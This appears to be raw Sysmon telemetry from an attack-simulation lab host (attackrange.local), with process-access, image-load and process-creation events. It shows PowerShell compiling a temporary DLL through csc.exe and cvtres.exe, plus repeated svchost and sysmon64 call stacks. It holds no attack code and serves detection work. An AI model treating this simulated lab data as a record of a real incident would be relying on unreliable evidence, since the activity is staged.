\Windows\SYSTEM32\ntdll.dll+6e871 11241100x8000000000000000410Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.localDLL2020-10-09 10:39:17.703{733EE690-3DD5-5F80-0503-000000007E01}4268C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeC:\Users\Administrator\AppData\Local\Temp\p2mkvfaq.dll2020-10-09 10:39:17.609 10341000x8000000000000000409Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:17.703{733EE690-3DD4-5F80-0003-000000007E01}43881144C:\Windows\system32\conhost.exe{733EE690-3DD5-5F80-0603-000000007E01}4356C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000408Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:17.703{733EE690-3C68-5F80-0C00-000000007E01}608932C:\Windows\system32\svchost.exe{733EE690-3DD0-5F80-ED02-000000007E01}4980C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000407Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:17.703{733EE690-3C68-5F80-0C00-000000007E01}608932C:\Windows\system32\svchost.exe{733EE690-3DD0-5F80-ED02-000000007E01}4980C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000406Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:17.703{733EE690-3C68-5F80-0C00-000000007E01}608932C:\Windows\system32\svchost.exe{733EE690-3DD0-5F80-ED02-000000007E01}4980C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000405Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:17.703{733EE690-3C68-5F80-0C00-000000007E01}608932C:\Windows\system32\svchost.exe{733EE690-3DD0-5F80-ED02-000000007E01}4980C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000404Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:17.703{733EE690-3C68-5F80-0C00-000000007E01}608932C:\Windows\system32\svchost.exe{733EE690-3DD0-5F80-ED02-000000007E01}4980C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000403Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:17.703{733EE690-3C68-5F80-0C00-000000007E01}608932C:\Windows\system32\svchost.exe{733EE690-3DD0-5F80-ED02-000000007E01}4980C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000402Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:17.703{733EE690-3C68-5F80-0C00-000000007E01}608932C:\Windows\system32\svchost.exe{733EE690-3DD0-5F80-ED02-000000007E01}4980C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000401Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:17.703{733EE690-3C68-5F80-0C00-000000007E01}608932C:\Windows\system32\svchost.exe{733EE690-3DD0-5F80-ED02-000000007E01}4980C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000400Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:17.703{733EE690-3C5B-5F80-0500-000000007E01}640764C:\Windows\system32\csrss.exe{733EE690-3DD5-5F80-0603-000000007E01}4356C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+6e87f 10341000x8000000000000000399Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:17.703{733EE690-3C68-5F80-0C00-000000007E01}608932C:\Windows\system32\svchost.exe{733EE690-3DD0-5F80-ED02-000000007E01}4980C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000398Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:17.703{733EE690-3DD5-5F80-0503-000000007E01}42682856C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe{733EE690-3DD5-5F80-0603-000000007E01}4356C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7194|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+b181|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+3d58|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+3ed0|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+3fa6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+274e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+27a0|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+28e4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+7e38f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+45d22|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+448ef|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+445e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+44303|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+18321|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+17b76|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+9e0d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+1edf02|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 154100x8000000000000000397Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:17.703{733EE690-3DD5-5F80-0603-000000007E01}4356C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe12.00.52519.0 built by: VSWINSERVICINGMicrosoft® Resource File To COFF Object Conversion UtilityMicrosoft® .NET FrameworkMicrosoft CorporationCVTRES.EXEC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\ADMINI~1\AppData\Local\Temp\RESD895.tmp" "c:\Users\Administrator\AppData\Local\Temp\CSC71E9EE9611F42DCB38AE15D1A7F89.TMP"C:\Users\Administrator\ATTACKRANGE\Administrator{733EE690-3DD4-5F80-0C83-110000000000}0x11830c0HighMD5=33BB8BE0B4F547324D93D5D2725CAC3D,SHA256=54315FD2B69C678EB7D8C145F683C15F41FA9F7B9ABF7BF978667DF4158F43C3,IMPHASH=9A65E39CA38ADDAA7D4BB704AD0223FF{733EE690-3DD5-5F80-0503-000000007E01}4268C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\ADMINI~1\AppData\Local\Temp\p2mkvfaq.cmdline" 10341000x8000000000000000396Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:17.609{733EE690-3DD4-5F80-0003-000000007E01}43881144C:\Windows\system32\conhost.exe{733EE690-3DD5-5F80-0503-000000007E01}4268C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000395Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:17.609{733EE690-3C68-5F80-0C00-000000007E01}608932C:\Windows\system32\svchost.exe{733EE690-3DD0-5F80-ED02-000000007E01}4980C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000394Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:17.609{733EE690-3C68-5F80-0C00-000000007E01}608932C:\Windows\system32\svchost.exe{733EE690-3DD0-5F80-ED02-000000007E01}4980C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000393Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:17.609{733EE690-3C68-5F80-0C00-000000007E01}608932C:\Windows\system32\svchost.exe{733EE690-3DD0-5F80-ED02-000000007E01}4980C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000392Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:17.609{733EE690-3C68-5F80-0C00-000000007E01}608932C:\Windows\system32\svchost.exe{733EE690-3DD0-5F80-ED02-000000007E01}4980C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000391Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:17.609{733EE690-3C68-5F80-0C00-000000007E01}608932C:\Windows\system32\svchost.exe{733EE690-3DD0-5F80-ED02-000000007E01}4980C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000390Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:17.609{733EE690-3C68-5F80-0C00-000000007E01}608932C:\Windows\system32\svchost.exe{733EE690-3DD0-5F80-ED02-000000007E01}4980C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000389Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:17.609{733EE690-3C68-5F80-0C00-000000007E01}608932C:\Windows\system32\svchost.exe{733EE690-3DD0-5F80-ED02-000000007E01}4980C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000388Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:17.609{733EE690-3C68-5F80-0C00-000000007E01}608932C:\Windows\system32\svchost.exe{733EE690-3DD0-5F80-ED02-000000007E01}4980C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000387Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:17.609{733EE690-3C68-5F80-0C00-000000007E01}608932C:\Windows\system32\svchost.exe{733EE690-3DD0-5F80-ED02-000000007E01}4980C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000386Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:17.609{733EE690-3C5B-5F80-0500-000000007E01}640764C:\Windows\system32\csrss.exe{733EE690-3DD5-5F80-0503-000000007E01}4268C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+6e87f 10341000x8000000000000000385Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:17.609{733EE690-3DD5-5F80-0303-000000007E01}24284948C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{733EE690-3DD5-5F80-0503-000000007E01}4268C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7194|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\78b8fb2c58a4cdcc3a44547b9bbd80b9\System.ni.dll+3332f6|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\78b8fb2c58a4cdcc3a44547b9bbd80b9\System.ni.dll+270222|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\78b8fb2c58a4cdcc3a44547b9bbd80b9\System.ni.dll+26fe9f|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\78b8fb2c58a4cdcc3a44547b9bbd80b9\System.ni.dll+26f9ee|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\78b8fb2c58a4cdcc3a44547b9bbd80b9\System.ni.dll+26f97a|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\78b8fb2c58a4cdcc3a44547b9bbd80b9\System.ni.dll+26e48b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\78b8fb2c58a4cdcc3a44547b9bbd80b9\System.ni.dll+7c1edb|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\78b8fb2c58a4cdcc3a44547b9bbd80b9\System.ni.dll+7c19a9|UNKNOWN(00007FFA1558B68F) 154100x8000000000000000384Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 